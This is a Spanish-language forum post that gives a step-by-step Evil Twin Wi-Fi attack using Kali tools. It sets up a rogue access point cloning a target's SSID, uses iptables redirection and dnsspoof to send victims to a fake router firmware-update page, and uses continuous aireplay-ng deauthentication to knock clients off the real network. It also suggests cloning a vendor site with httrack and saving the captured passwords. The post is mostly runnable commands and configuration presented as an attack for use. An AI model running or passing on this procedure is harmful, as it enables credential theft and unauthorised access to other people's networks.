Soty Posted January 9 Share Posted January 9 Ataque Evil Twin sin utilizar ningún hardware adicional (Tal vez una NIC externa) Usando un sistema operativo basado en debian (kali) El objetivo del ataque es noquear a los clientes wifi, hacer que se reconecten a un punto de acceso falso con el mismo nombre (la mayoría de las veces se reconectarán automáticamente siempre y cuando tengan exactamente el mismo nombre) luego redirigir los paquetes a nuestra página de actualización de firmware y pedirles la contraseña para facilitar el acceso a la red más tarde. No voy a ir sobre la configuración de apache2/nginx o incluso una pequeña aplicación backend. google it. No voy a ir sobre cómo configurar una base de datos. google it. Las preguntas son bienvenidas. pero probablemente te diré que lo busques en google. PASO A PASO EN TERMINAL DE KALI 1- sudo apt install hostapd dnsmasq apache2 2- iwconfig [iface] mode monitor 3 - mkdir evil-twin && cd evil twin 4 - vim hostapd.conf -> interface = [iface] -> driver = [drivername] #usually works with nl80211 -> ssid = [essid of target] -> hw_mode =g -> channel = [channel of target] -> macaddr_acl = 0 -> ignore_broadcast_ssid = 0 5- vim dnsmasq.conf -> interface = [iface] -> dhcp-range = 192.168.1.2, 192.168.1.30, 255.255.255.0, 12h -> dhcp-option=3, 192.168.1.1 -> dhcp-option=6, 192.168.1.1 -> server = 8.8.8.8 -> log-queries -> log-dhcp -> listen-address=127.0.0.1 6- ifconfig [iface] up 192.168.1.1 netmask 255.255.255.0 7- route add -net 192.168.1.0netmask 255.255.255.0 gw 192.168.1.1 8- iptables --table nat --append PREROUTING -i [iface] -p tcp -j REDIRECT --to-ports <ports running ur portal> 9- setting up the portal this will require you to have some social enginneering skills, some basic frontend knowledge and ull have to do some reconnaissance probably know the brand of the router to emulate a firmware update I will not link any samples I recommend you use httrack to copy a revelant website and play with the html css maybe set a small backend app with the scripting language of your choice and maybe set appache/nginx 2 serve the app or redirect the victim to ur dev server. ur choice. 10- u might need to set up a database at this point or just configure the backend so that the user input is saved in some file 11- hostapd hostapd.conf 12 - dnsmasq -C dnsmasq.conf -d 13 - dnsspoof -i [iface] 14 - aireplay-ng --deauth 0 -a [victime's bssid] [iface] #wifi ddos Quote Link to comment Share on other sites More sharing options...
Recommended Posts